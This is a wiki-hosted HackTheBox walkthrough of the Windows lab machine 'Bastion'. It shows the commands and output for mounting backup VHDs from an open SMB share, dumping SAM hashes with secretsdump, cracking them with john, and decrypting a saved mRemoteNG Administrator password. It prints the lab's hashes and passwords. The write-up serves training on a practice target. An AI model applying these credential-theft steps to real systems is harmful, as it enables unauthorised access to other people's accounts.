imported>Aghanim at 13:15, 21 April 2022

2022-04-21T13:15:40Z

New page

{{Infobox WriteUp
| name = Bastion
| platform = HackTheBox
| os = Windows
| difficulty = Easy
| techniques = SMB, VHD Mount, SAM Dump
}}

[[File:2022-04-Bastion.png|thumb]]

On this Windows machine there was a SMB share that had two '''VHDs '''that we could remotly mount. The VHDs looked like a backup of a Windows. Using '''secretsdump '''we could dump the hash from from the /system32/config, and get the hash for users. Using john the ripper, I cracked the hash for '''L4mpje'''. After enumerating the machine we find that '''mremoteng '''is installed. There was a saved session, which had the hash for the user '''Administrator'''. Cracking that we got the password for '''nt authority\ system'''.

----

== Enumeration ==

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/bastion]
└─# cat nmap.ver 1 ⨯
# Nmap 7.92 scan initiated Thu Feb 10 14:07:35 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.ver 10.10.10.134
Warning: 10.10.10.134 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.134
Host is up (0.040s latency).
Not shown: 65472 closed tcp ports (reset), 50 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -18m00s, deviation: 34m36s, median: 1m57s
| smb2-time:
| date: 2022-02-10T19:10:43
|_ start_date: 2022-02-10T18:38:34
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-02-10T20:10:45+01:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
</syntaxhighlight>

=== SMB ===

<syntaxhighlight lang="bash">
smbclient -N -L //10.10.10.134

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
</syntaxhighlight>

Inside the share '''Backups '''there are two VHD files.

<syntaxhighlight lang="bash">
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:45:32 2019
BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 2019

5638911 blocks of size 4096. 1175978 blocks available
</syntaxhighlight>

=== Mount VHD remotely ===

Instead of downloadng the VHDs and mount them on a Windows machine, I can just mount them remotly using '''guestmount'''

Step 1 - Install dependencies

<syntaxhighlight lang="bash">
sudo apt-get install libguestfs-tools
sudo apt-get install cifs-utils
</syntaxhighlight>

Step 2 - Find partition detail

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/mnt/bastion/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
└─# sudo guestfish --ro -a 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd 1 ⨯

Welcome to guestfish, the guest filesystem shell for
editing virtual machine filesystems and disk images.

Type: ‘help’ for help on commands
‘man’ to read the manual
‘quit’ to quit the shell

> run
100% ⟦▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒⟧ 00:00-
> list-filesystems
/dev/sda1: ntfs
> exit
</syntaxhighlight>

Step 3 - Mount

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/mnt/bastion/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
└─# sudo guestmount -a 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd -m /dev/sda1 --ro /mnt/vhd
</syntaxhighlight>

Step 4 - Go to location

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/mnt/vhd]
└─# ls -l
total 392
drwxrwxrwx 1 root root 4096 Feb 22 2019 Boot
-rwxrwxrwx 1 root root 383786 Nov 20 2010 bootmgr
-rwxrwxrwx 1 root root 8192 Feb 22 2019 BOOTSECT.BAK
drwxrwxrwx 1 root root 4096 Feb 22 2019 'System Volume Information'
</syntaxhighlight>

Step 4 part 2 - Go to location 2

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/mnt/vhd2]
└─# ls -l 1 ⨯
total 2096729
drwxrwxrwx 1 root root 0 Feb 22 2019 '$Recycle.Bin'
-rwxrwxrwx 1 root root 24 Jun 10 2009 autoexec.bat
-rwxrwxrwx 1 root root 10 Jun 10 2009 config.sys
lrwxrwxrwx 2 root root 14 Jul 14 2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx 1 root root 2147016704 Feb 22 2019 pagefile.sys
drwxrwxrwx 1 root root 0 Jul 13 2009 PerfLogs
drwxrwxrwx 1 root root 4096 Jul 14 2009 ProgramData
drwxrwxrwx 1 root root 4096 Apr 11 2011 'Program Files'
drwxrwxrwx 1 root root 0 Feb 22 2019 Recovery
drwxrwxrwx 1 root root 4096 Feb 22 2019 'System Volume Information'
drwxrwxrwx 1 root root 4096 Feb 22 2019 Users
drwxrwxrwx 1 root root 16384 Feb 22 2019 Windows
</syntaxhighlight>

== Shell as L4mpje ==

=== Dump hash ===

Since this is a VHD (Virtual harddisk) of a Windows machine I could dump the hash from the registary. Usually on a running system, this would be locked. In /system32/config I'll use '''impacket-secretsdump'''.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/mnt/vhd2/Windows/System32/config]
└─# /usr/bin/impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...
</syntaxhighlight>

=== Crack the hash ===

And using john the rupper to crack the hash for the user L4mpje.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/bastion]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje (L4mpje)
1g 0:00:00:00 DONE (2022-02-10 17:17) 1.351g/s 12696Kp/s 12696Kc/s 12696KC/s burg772v..burdy1
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
</syntaxhighlight>

=== SSH ===

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/bastion]
└─# ssh L4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ED25519 key fingerprint is SHA256:2ZbIDKRPlngECX1WSMqnucdOWthIaPG7wQ6mBReac7M.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '10.10.10.134' (ED25519) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa':
L4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>
</syntaxhighlight>

== Shell as NT AUTHORITY\SYSTEM ==

=== mremoteng ===

Looking through the system we find that '''mremoteng''' is installed. Mremoteng is a remote management tool for managing remote connections. It also allows you to save passwords for sessions.

<syntaxhighlight lang="bash">
PS C:\Program Files (x86)> ls

Directory: C:\Program Files (x86)

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 16-7-2016 15:23 Common Files
d----- 23-2-2019 09:38 Internet Explorer
d----- 16-7-2016 15:23 Microsoft.NET
da---- 22-2-2019 14:01 mRemoteNG
d----- 23-2-2019 10:22 Windows Defender
d----- 23-2-2019 09:38 Windows Mail
d----- 23-2-2019 10:22 Windows Media Player
d----- 16-7-2016 15:23 Windows Multimedia Platform
d----- 16-7-2016 15:23 Windows NT
d----- 23-2-2019 10:22 Windows Photo Viewer
d----- 16-7-2016 15:23 Windows Portable Devices
d----- 16-7-2016 15:23 WindowsPowerShell
</syntaxhighlight>

Look through the files I find '''confCons.xml''' which have the hash for the user Administrator.

<syntaxhighlight lang="bash">
PS C:\Users\L4mpje\AppData\Roaming\mRemoteNG> cat .\confCons.xml

=== mremoteng-decryptor.py ===

Using mremoteng-decrypter I was able to crack the hash and get the password for the user Administrator.

</syntaxhighlight>
<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/…/Desktop/HTB/bastion/mRemoteNG-Decrypt]
└─# python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
</syntaxhighlight>

=== Shell ===

┌──(root💀kali)-[/home/aghanim]
└─# ssh administrator@10.10.10.134
Enter passphrase for key '/root/.ssh/id_rsa':
administrator@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator

</pre>

[[Category:HackTheBox]]
[[Category:Windows]]
[[Category:Write-ups]]

Write-ups/HTB/Bastion - Revision history

imported>Aghanim at 13:15, 21 April 2022